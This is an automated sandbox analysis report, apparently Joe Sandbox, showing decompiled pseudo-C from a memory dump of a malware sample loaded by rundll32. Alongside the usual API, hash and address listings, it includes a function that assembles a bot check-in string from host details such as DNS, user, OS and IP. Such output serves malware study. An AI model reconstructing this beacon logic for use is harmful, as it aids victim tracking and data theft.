                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 979ac44a524f2191716c22b768c42fcb7fc121b3088bf7f6f1bdab740f417261
                                          • Instruction ID: 26ff0837891a7f60a927665dbc20c67e97ad8d0d56a61565aa5f39daae25912a
                                          • Opcode Fuzzy Hash: 979ac44a524f2191716c22b768c42fcb7fc121b3088bf7f6f1bdab740f417261
                                          • Instruction Fuzzy Hash: C30128B2600205AAF7106FE6DD84F7E76AFEB45364F0C0035F948C60A0D6A4FD839361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD1B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E04FD7BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E04FD74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x4fdd238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x04fd1b1b
                                          0x04fd1b72
                                          0x04fd1b77
                                          0x04fd1b1d
                                          0x04fd1b37
                                          0x04fd1b3b
                                          0x04fd1b40
                                          0x04fd1b42
                                          0x04fd1b54
                                          0x04fd1b60
                                          0x04fd1b44
                                          0x04fd1b44
                                          0x04fd1b49
                                          0x04fd1b4e
                                          0x04fd1b4e
                                          0x04fd1b42
                                          0x04fd1b3b
                                          0x04fd1b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04FD690C,?,004F0053,07529388,00000000,?), ref: 04FD1B60
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 61ef488e7445729efea19a69bd5507a4337dc18fc9ed6588bbcbad42fcd733da
                                          • Instruction ID: e74e9f7747061cf73a1276fa2e6f27b545b8e0fb7ce43b18990fa83fbb0c9fbc
                                          • Opcode Fuzzy Hash: 61ef488e7445729efea19a69bd5507a4337dc18fc9ed6588bbcbad42fcd733da
                                          • Instruction Fuzzy Hash: 27018632100209FBDB22DF94DC05FAA3BAAFF04760F0C8019FA199E160E730A921D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDA872, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E04FDA872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                          0x04fda872
                                          0x04fda87f
                                          0x04fda880
                                          0x04fda881
                                          0x04fda888
                                          0x04fda8b6
                                          0x04fda8b7
                                          0x04fda8ba
                                          0x04fda8c0
                                          0x00000000
                                          0x00000000
                                          0x04fda89f
                                          0x04fda8a9
                                          0x04fda8b0
                                          0x00000000
                                          0x04fda8a1
                                          0x04fda8a4
                                          0x04fda8c4
                                          0x04fda8a6
                                          0x04fda8a6
                                          0x00000000
                                          0x04fda8a6
                                          0x04fda8a4
                                          0x04fda8cb
                                          0x04fda8d1
                                          0x04fda8d1
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: fc4149149ae0fc61b0f86c97429f9d0eedde91b4964533a8ed83f216fbc27266
                                          • Instruction ID: 8d288c336f815afd559cd0fee45c5dbde01d55b0c52679f1941a75984fa37f88
                                          • Opcode Fuzzy Hash: fc4149149ae0fc61b0f86c97429f9d0eedde91b4964533a8ed83f216fbc27266
                                          • Instruction Fuzzy Hash: A8F0E776D01218EFDB00DB94D588AEDB7B8EF05305F1484BAE902A7240E7B46B86DF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD1BC1, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(04FD553C,?,?,04FDA818,3D04FDC0,80000002,04FD553C,04FD9642,74666F53,4D4C4B48,04FD9642,?,3D04FDC0,80000002,04FD553C,?), ref: 04FD1BE1
                                            • Part of subcall function 04FD6C68: SysAllocString.OLEAUT32(04FD9642), ref: 04FD6C81
                                            • Part of subcall function 04FD6C68: SysFreeString.OLEAUT32(00000000), ref: 04FD6CC2
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreelstrlen
                                          • String ID:
                                          • API String ID: 3808004451-0
                                          • Opcode ID: dca11567b91903cad4de77cc7f21e2351f4029c8edf6243f7c1ebb647183dd96
                                          • Instruction ID: d4911a8850558721469da3df5b1728432d60ec74c5cc370c3baf89cd92025ed0
                                          • Opcode Fuzzy Hash: dca11567b91903cad4de77cc7f21e2351f4029c8edf6243f7c1ebb647183dd96
                                          • Instruction Fuzzy Hash: F8E0AE3200420EBFDF129F90EC46EAA3F6BEF08354F188115FA1458060D772A9B1EBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD60CF, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD60CF(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E04FD7A28(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E04FD147E(_a4);
				}
				return _t13;
			}





                                          0x04fd60db
                                          0x04fd60e0
                                          0x04fd60e4
                                          0x04fd60eb
                                          0x04fd60f6
                                          0x04fd60fa
                                          0x04fd60fa
                                          0x04fd6103

                                          APIs
                                            • Part of subcall function 04FD7A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04FD7A5E
                                            • Part of subcall function 04FD7A28: memset.NTDLL ref: 04FD7AD3
                                            • Part of subcall function 04FD7A28: memset.NTDLL ref: 04FD7AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04FD9F9F,?,?,04FD9C62,00000002,?,?,?), ref: 04FD60EB
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: fb526b628cd957ca487e5e5f472ad126810454c2f4715b40005a2fcc09709a43
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: A4E0C277500129B7DB223E94DC00DEF7F5ECF566D1F084020FE089A215DA31EA11A3E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 04FD514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E04FD514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x4fdd018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x4fdd014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x4fdd010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x4fdd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x4fdd2a4; // 0x254a5a8
				_t3 = _t31 + 0x4fde633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x4fdd02c,  *0x4fdd004, _t26);
				_t34 = E04FD57AB();
				_t35 =  *0x4fdd2a4; // 0x254a5a8
				_t4 = _t35 + 0x4fde673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E04FD73E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x4fdd2a4; // 0x254a5a8
					_t6 = _t86 + 0x4fde8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x4fdd238, 0, _t99);
				}
				_t100 = E04FD614A();
				if(_t100 != 0) {
					_t81 =  *0x4fdd2a4; // 0x254a5a8
					_t8 = _t81 + 0x4fde8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x4fdd238, 0, _t100);
				}
				_t101 =  *0x4fdd324; // 0x75295b0
				_a32 = E04FD757B(0x4fdd00a, _t101 + 4);
				_t43 =  *0x4fdd2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x4fdd2a4; // 0x254a5a8
					_t11 = _t77 + 0x4fde8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x4fdd2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x4fdd2a4; // 0x254a5a8
					_t13 = _t74 + 0x4fde8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x4fdd238, 0, 0x800);
					if(_t103 != 0) {
						E04FD749F(GetTickCount());
						_t51 =  *0x4fdd324; // 0x75295b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x4fdd324; // 0x75295b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x4fdd324; // 0x75295b0
						_t106 = E04FD4D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x4fdc294);
							_t63 =  *0x4fdd2a4; // 0x254a5a8
							_push(_t106);
							_t15 = _t63 + 0x4fde252; // 0x616d692f
							_t65 = E04FD9DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E04FD666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E04FD6106();
								}
								HeapFree( *0x4fdd238, 0, _v48);
							}
							HeapFree( *0x4fdd238, 0, _t106);
						}
						HeapFree( *0x4fdd238, 0, _t103);
					}
					HeapFree( *0x4fdd238, 0, _a24);
				}
				HeapFree( *0x4fdd238, 0, _t108);
				return _a12;
			}

















































                                          0x04fd514f
                                          0x04fd514f
                                          0x04fd514f
                                          0x04fd5154
                                          0x04fd515a
                                          0x04fd5164
                                          0x04fd5166
                                          0x04fd5166
                                          0x04fd5173
                                          0x04fd517e
                                          0x04fd5181
                                          0x04fd518c
                                          0x04fd518f
                                          0x04fd5194
                                          0x04fd5197
                                          0x04fd519c
                                          0x04fd519f
                                          0x04fd51ab
                                          0x04fd51b8
                                          0x04fd51ba
                                          0x04fd51c0
                                          0x04fd51c5
                                          0x04fd51d0
                                          0x04fd51d2
                                          0x04fd51d5
                                          0x04fd51dc
                                          0x04fd51e0
                                          0x04fd51e2
                                          0x04fd51e7
                                          0x04fd51f3
                                          0x04fd51f5
                                          0x04fd5201
                                          0x04fd5203
                                          0x04fd5203
                                          0x04fd520e
                                          0x04fd5212
                                          0x04fd5214
                                          0x04fd5219
                                          0x04fd5225
                                          0x04fd5227
                                          0x04fd5233
                                          0x04fd5235
                                          0x04fd5235
                                          0x04fd523b
                                          0x04fd524e
                                          0x04fd5252
                                          0x04fd5259
                                          0x04fd525c
                                          0x04fd5261
                                          0x04fd526c
                                          0x04fd526e
                                          0x04fd5271
                                          0x04fd5271
                                          0x04fd5273
                                          0x04fd527a
                                          0x04fd527d
                                          0x04fd5282
                                          0x04fd528c
                                          0x04fd528e
                                          0x04fd5296
                                          0x04fd52af
                                          0x04fd52b3
                                          0x04fd52bf
                                          0x04fd52c4
                                          0x04fd52cd
                                          0x04fd52de
                                          0x04fd52e2
                                          0x04fd52eb
                                          0x04fd52f1
                                          0x04fd52fe
                                          0x04fd530b
                                          0x04fd5311
                                          0x04fd531d
                                          0x04fd5323
                                          0x04fd5328
                                          0x04fd5329
                                          0x04fd5330
                                          0x04fd5335
                                          0x04fd533b
                                          0x04fd5341
                                          0x04fd5348
                                          0x04fd534f
                                          0x04fd5355
                                          0x04fd535c
                                          0x04fd5360
                                          0x04fd536b
                                          0x04fd5370
                                          0x04fd5376
                                          0x04fd537f
                                          0x04fd537f
                                          0x04fd5390
                                          0x04fd5390
                                          0x04fd539f
                                          0x04fd539f
                                          0x04fd53ae
                                          0x04fd53ae
                                          0x04fd53c0
                                          0x04fd53c0
                                          0x04fd53cf
                                          0x04fd53e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04FD5166
                                          • wsprintfA.USER32 ref: 04FD51B3
                                          • wsprintfA.USER32 ref: 04FD51D0
                                          • wsprintfA.USER32 ref: 04FD51F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD5203
                                          • wsprintfA.USER32 ref: 04FD5225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD5235
                                          • wsprintfA.USER32 ref: 04FD526C
                                          • wsprintfA.USER32 ref: 04FD528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04FD52A9
                                          • GetTickCount.KERNEL32 ref: 04FD52B9
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD52CD
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD52EB
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?,075295B0), ref: 04FD4D57
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(?,?,?,04FD52FE,?,075295B0), ref: 04FD4D5F
                                            • Part of subcall function 04FD4D2C: strcpy.NTDLL ref: 04FD4D76
                                            • Part of subcall function 04FD4D2C: lstrcat.KERNEL32(00000000,?), ref: 04FD4D81
                                            • Part of subcall function 04FD4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD4D9E
                                          • StrTrimA.SHLWAPI(00000000,04FDC294,?,075295B0), ref: 04FD531D
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?,00000000,00000000,04FD5335,616D692F,00000000), ref: 04FD9DFB
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?), ref: 04FD9E03
                                            • Part of subcall function 04FD9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04FD9E1A
                                            • Part of subcall function 04FD9DEF: lstrcat.KERNEL32(00000000,?), ref: 04FD9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04FD5348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 04FD535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04FD5360
                                            • Part of subcall function 04FD666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04FD6720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04FD5390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04FD539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,075295B0), ref: 04FD53AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD53C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD53CF
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 1333ee4593f815bac282a55342f74bb6abe79436d52f9001c87906223bfb43cd
                                          • Instruction ID: 5d22c497faab0785b18a9bb843157d9d77142c99149baa20b839e654d142c648
                                          • Opcode Fuzzy Hash: 1333ee4593f815bac282a55342f74bb6abe79436d52f9001c87906223bfb43cd
                                          • Instruction Fuzzy Hash: 55619E72502209AFE711AFB4FC48E5A7BEFEB48745F090118F908DB250D729ED06DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E04FDADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4fd0000;
				_t115 = _t139[3] + 0x4fd0000;
				_t131 = _t139[4] + 0x4fd0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4fd0000;
				_v16 = _t139[5] + 0x4fd0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4fd0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4fdd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4fdd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4fdd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4fdd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4fdd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4fdd198; // 0x0
										 *_t102 = _t125;
										 *0x4fdd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4fdd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x04fdadb4
                                          0x04fdadca
                                          0x04fdadd0
                                          0x04fdadd2
                                          0x04fdadd7
                                          0x04fdaddd
                                          0x04fdade2
                                          0x04fdade5
                                          0x04fdadf3
                                          0x04fdadfa
                                          0x04fdadfd
                                          0x04fdae00
                                          0x04fdae01
                                          0x04fdae04
                                          0x04fdae07
                                          0x04fdae0a
                                          0x04fdae0f
                                          0x04fdae1e
                                          0x00000000
                                          0x04fdae24
                                          0x04fdae2e
                                          0x04fdae38
                                          0x04fdae3d
                                          0x04fdae3f
                                          0x04fdae49
                                          0x04fdae4c
                                          0x04fdae4f
                                          0x04fdae55
                                          0x04fdae57
                                          0x04fdae57
                                          0x04fdae5a
                                          0x04fdae5d
                                          0x04fdae62
                                          0x04fdae66
                                          0x04fdae79
                                          0x04fdae7b
                                          0x04fdaf23
                                          0x04fdaf23
                                          0x04fdaf2a
                                          0x04fdaf2d
                                          0x04fdaf37
                                          0x04fdaf37
                                          0x04fdaf3b
                                          0x04fdafb9
                                          0x04fdafbc
                                          0x04fdafbe
                                          0x04fdafbe
                                          0x04fdafc5
                                          0x04fdafc7
                                          0x04fdafd1
                                          0x04fdafd4
                                          0x04fdafd7
                                          0x04fdafd7
                                          0x00000000
                                          0x04fdaf3d
                                          0x04fdaf40
                                          0x04fdaf6e
                                          0x04fdaf78
                                          0x04fdaf7c
                                          0x04fdaf84
                                          0x04fdaf87
                                          0x04fdaf8e
                                          0x04fdaf98
                                          0x04fdaf98
                                          0x04fdaf9c
                                          0x04fdafa1
                                          0x04fdafb0
                                          0x04fdafb6
                                          0x04fdafb6
                                          0x04fdaf9c
                                          0x00000000
                                          0x04fdaf47
                                          0x04fdaf4a
                                          0x04fdaf52
                                          0x04fdaf67
                                          0x04fdaf6c
                                          0x00000000
                                          0x00000000
                                          0x04fdaf6c
                                          0x00000000
                                          0x04fdaf52
                                          0x04fdaf40
                                          0x04fdaf3b
                                          0x04fdae81
                                          0x04fdae88
                                          0x04fdae98
                                          0x04fdaea1
                                          0x04fdaea5
                                          0x04fdaee8
                                          0x04fdaef4
                                          0x04fdaf1d
                                          0x04fdaef6
                                          0x04fdaefa
                                          0x04fdaf00
                                          0x04fdaf08
                                          0x04fdaf0a
                                          0x04fdaf0d
                                          0x04fdaf13
                                          0x04fdaf15
                                          0x04fdaf15
                                          0x04fdaf08
                                          0x04fdaefa
                                          0x00000000
                                          0x04fdaef4
                                          0x04fdaead
                                          0x04fdaeb0
                                          0x04fdaeb7
                                          0x04fdaec7
                                          0x04fdaeca
                                          0x04fdaeda
                                          0x00000000
                                          0x04fdaee0
                                          0x04fdaec1
                                          0x04fdaec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fdaec5
                                          0x04fdae92
                                          0x04fdae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fdae96
                                          0x04fdae6f
                                          0x04fdae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04FDAE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 04FDAE9B
                                          • GetLastError.KERNEL32 ref: 04FDAEA7
